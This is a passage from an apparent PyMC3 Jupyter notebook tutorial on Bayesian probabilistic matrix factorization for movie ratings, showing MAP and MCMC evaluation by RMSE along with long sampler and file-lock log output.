/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291968 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291536 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098291536 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375056 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375056 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098409552 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098409552 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940240 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940240 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098292208 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098292208 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098512336 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098512336 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570400 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570400 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940048 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097940048 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202784 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079202784 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184176 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184176 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097931280 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097931280 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570064 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098570064 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375344 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098375344 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966656 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096966656 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098428640 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098428640 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098255680 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098255680 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084264048 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084264048 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098624368 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478098624368 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184848 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184848 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066337488 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066337488 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097278000 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097278000 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096729520 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096729520 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084013984 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084013984 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066083824 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066083824 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055909600 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055909600 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113503888 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113503888 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118183696 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118183696 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118205424 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118205424 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203189616 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203189616 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203877312 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203877312 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831872 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831872 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203900544 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203900544 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203903568 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203903568 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478120579664 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478120579664 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204186048 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204186048 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203733232 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203733232 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203766624 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203766624 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077760 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077760 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204756800 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204756800 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204154064 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204154064 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204137088 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204137088 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204179072 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204179072 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\n"
]
],
[
[
"Excellent. The first thing we want to do is make sure the MAP estimate we obtained is reasonable. We can do this by computing RMSE on the predicted ratings obtained from the MAP values of $U$ and $V$. First we define a function for generating the predicted ratings $R$ from $U$ and $V$. We ensure the actual rating bounds are enforced by setting all values below 1 to 1 and all values above 5 to 5. Finally, we compute RMSE for both the training set and the test set. We expect the test RMSE to be higher. The difference between the two gives some idea of how much we have overfit. Some difference is always expected, but a very low RMSE on the training set with a high RMSE on the test set is a definite sign of overfitting.",
"_____no_output_____"
]
],
[
[
"def eval_map(pmf_model, train, test):\n U = pmf_model.map[\"U\"]\n V = pmf_model.map[\"V\"]\n\n # Make predictions and calculate RMSE on train & test sets.\n predictions = pmf_model.predict(U, V)\n train_rmse = rmse(train, predictions)\n test_rmse = rmse(test, predictions)\n overfit = test_rmse - train_rmse\n\n # Print report.\n print(\"PMF MAP training RMSE: %.5f\" % train_rmse)\n print(\"PMF MAP testing RMSE: %.5f\" % test_rmse)\n print(\"Train/test difference: %.5f\" % overfit)\n\n return test_rmse\n\n\n# Add eval function to PMF class.\nPMF.eval_map = eval_map",
"_____no_output_____"
],
[
"# Evaluate PMF MAP estimates.\npmf_map_rmse = pmf.eval_map(train, test)\npmf_improvement = baselines[\"mom\"] - pmf_map_rmse\nprint(\"PMF MAP Improvement: %.5f\" % pmf_improvement)",
"PMF MAP training RMSE: 1.01099\nPMF MAP testing RMSE: 1.13324\nTrain/test difference: 0.12225\nPMF MAP Improvement: -0.10956\n"
]
],
[
[
"We actually see a decrease in performance between the MAP estimate and the mean of means performance. We also have a fairly large difference in the RMSE values between the train and the test sets. This indicates that the point estimates for $\\alpha_U$ and $\\alpha_V$ that we calculated from our data are not doing a great job of controlling model complexity. \n\nLet's see if we can improve our estimates by approximating our posterior distribution with MCMC sampling. We'll draw 500 samples, with 500 tuning samples.",
"_____no_output_____"
],
[
"### Predictions using MCMC",
"_____no_output_____"
]
],
[
[
"# Draw MCMC samples.\npmf.draw_samples(\n draws=500,\n tune=500,\n)",
"/Users/CloudChaoszero/Documents/Projects-Dev/pymc3/pymc3/sampling.py:465: FutureWarning: In an upcoming release, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.\n warnings.warn(\nAuto-assigning NUTS sampler...\nINFO:pymc3:Auto-assigning NUTS sampler...\nInitializing NUTS using jitter+adapt_diag...\nINFO:pymc3:Initializing NUTS using jitter+adapt_diag...\nINFO:filelock:Lock 140478073148560 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478073148560 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478068598672 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478068598672 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478072955088 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478072955088 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478071840096 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478071840096 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478248513648 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478248513648 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478236445712 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478236445712 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478253280848 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478253280848 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256911744 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256911744 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256563200 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256563200 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079204032 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079204032 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256618608 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256618608 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113502832 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113502832 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257044064 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257044064 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257049456 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257049456 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256931072 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256931072 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257042576 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257042576 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257770704 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257770704 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257774016 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257774016 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257882928 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257882928 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478202955760 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478202955760 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831632 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831632 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203735440 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203735440 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077568 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077568 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203167216 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203167216 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118129280 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118129280 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nSequential sampling (1 chains in 1 job)\nINFO:pymc3:Sequential sampling (1 chains in 1 job)\nNUTS: [V, U]\nINFO:pymc3:NUTS: [V, U]\n"
]
],
[
[
"### Diagnostics and Posterior Predictive Check\n\nThe next step is to check how many samples we should discard as burn-in. Normally, we'd do this using a traceplot to get some idea of where the sampled variables start to converge. In this case, we have high-dimensional samples, so we need to find a way to approximate them. One way was proposed by [Salakhutdinov and Mnih, p.886](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf). We can calculate the Frobenius norms of $U$ and $V$ at each step and monitor those for convergence. This essentially gives us some idea when the average magnitude of the latent variables is stabilizing. The equations for the Frobenius norms of $U$ and $V$ are shown below. We will use `numpy`'s `linalg` package to calculate these.\n\n$$ \\|U\\|_{Fro}^2 = \\sqrt{\\sum_{i=1}^N \\sum_{d=1}^D |U_{id}|^2}, \\hspace{40pt} \\|V\\|_{Fro}^2 = \\sqrt{\\sum_{j=1}^M \\sum_{d=1}^D |V_{jd}|^2} $$",
"_____no_output_____"
]
],
[
[
"def _norms(pmf_model, monitor=(\"U\", \"V\"), ord=\"fro\"):\n \"\"\"Return norms of latent variables at each step in the\n sample trace. These can be used to monitor convergence\n of the sampler.\n \"\"\"\n monitor = (\"U\", \"V\")\n norms = {var: [] for var in monitor}\n for sample in pmf_model.trace:\n for var in monitor:\n norms[var].append(np.linalg.norm(sample[var], ord))\n return norms\n\n\ndef _traceplot(pmf_model):\n \"\"\"Plot Frobenius norms of U and V as a function of sample #.\"\"\"\n trace_norms = pmf_model.norms()\n u_series = pd.Series(trace_norms[\"U\"])\n v_series = pd.Series(trace_norms[\"V\"])\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 7))\n u_series.plot(kind=\"line\", ax=ax1, grid=False, title=r\"$\\|U\\|_{Fro}^2$ at Each Sample\")\n v_series.plot(kind=\"line\", ax=ax2, grid=False, title=r\"$\\|V\\|_{Fro}^2$ at Each Sample\")\n ax1.set_xlabel(\"Sample Number\")\n ax2.set_xlabel(\"Sample Number\")\n\n\nPMF.norms = _norms\nPMF.traceplot = _traceplot",
"_____no_output_____"
],
[
"pmf.traceplot()",
"_____no_output_____"
]
],
[
[
"It appears we get convergence of $U$ and $V$ after about the default tuning. When testing for convergence, we also want to see convergence of the particular statistics we are looking for, since different characteristics of the posterior may converge at different rates. Let's also do a traceplot of the RSME. We'll compute RMSE for both the train and the test set, even though the convergence is indicated by RMSE on the training set alone. In addition, let's compute a running RMSE on the train/test sets to see how aggregate performance improves or decreases as we continue to sample.\n\nNotice here that we are sampling from 1 chain only, which makes the convergence statisitcs like $\\hat{r}$ impossible (we can still compute the split-rhat but the purpose is different). The reason of not sampling multiple chain is that PMF might not have unique solution. Thus without constraints, the solutions are at best symmetrical, at worse identical under any rotation, in any case subject to label switching. In fact if we sample from multiple chains we will see large $\\hat{r}$ indicating the sampler is exploring different solutions in different part of parameter space.",
"_____no_output_____"
]
],
[
[
"def _running_rmse(pmf_model, test_data, train_data, burn_in=0, plot=True):\n \"\"\"Calculate RMSE for each step of the trace to monitor convergence.\"\"\"\n burn_in = burn_in if len(pmf_model.trace) >= burn_in else 0\n results = {\"per-step-train\": [], \"running-train\": [], \"per-step-test\": [], \"running-test\": []}\n R = np.zeros(test_data.shape)\n for cnt, sample in enumerate(pmf_model.trace[burn_in:]):\n sample_R = pmf_model.predict(sample[\"U\"], sample[\"V\"])\n R += sample_R\n running_R = R / (cnt + 1)\n results[\"per-step-train\"].append(rmse(train_data, sample_R))\n results[\"running-train\"].append(rmse(train_data, running_R))\n results[\"per-step-test\"].append(rmse(test_data, sample_R))\n results[\"running-test\"].append(rmse(test_data, running_R))\n\n results = pd.DataFrame(results)\n\n if plot:\n results.plot(\n kind=\"line\",\n grid=False,\n figsize=(15, 7),\n title=\"Per-step and Running RMSE From Posterior Predictive\",\n )\n\n # Return the final predictions, and the RMSE calculations\n return running_R, results\n\n\nPMF.running_rmse = _running_rmse",
"_____no_output_____"
],
[
"predicted, results = pmf.running_rmse(test, train)",
"_____no_output_____"
],
[
"# And our final RMSE?\nfinal_test_rmse = results[\"running-test\"].values[-1]\nfinal_train_rmse = results[\"running-train\"].values[-1]\nprint(\"Posterior predictive train RMSE: %.5f\" % final_train_rmse)\nprint(\"Posterior predictive test RMSE: %.5f\" % final_test_rmse)\nprint(\"Train/test difference: %.5f\" % (final_test_rmse - final_train_rmse))\nprint(\"Improvement from MAP: %.5f\" % (pmf_map_rmse - final_test_rmse))\nprint(\"Improvement from Mean of Means: %.5f\" % (baselines[\"mom\"] - final_test_rmse))",
"Posterior predictive train RMSE: 0.78051\nPosterior predictive test RMSE: 0.91320\nTrain/test difference: 0.13269\nImprovement from MAP: 0.22004\nImprovement from Mean of Means: 0.11048\n"
]
],
[
[
"We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\\alpha_U$ and $\\alpha_V$ and we chose a fixed precision $\\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\\alpha$ is likely different as well.",
"_____no_output_____"
],
[
"We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\\alpha_U$ and $\\alpha_V$ and we chose a fixed precision $\\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\\alpha$ is likely different as well.",
"_____no_output_____"
],
[
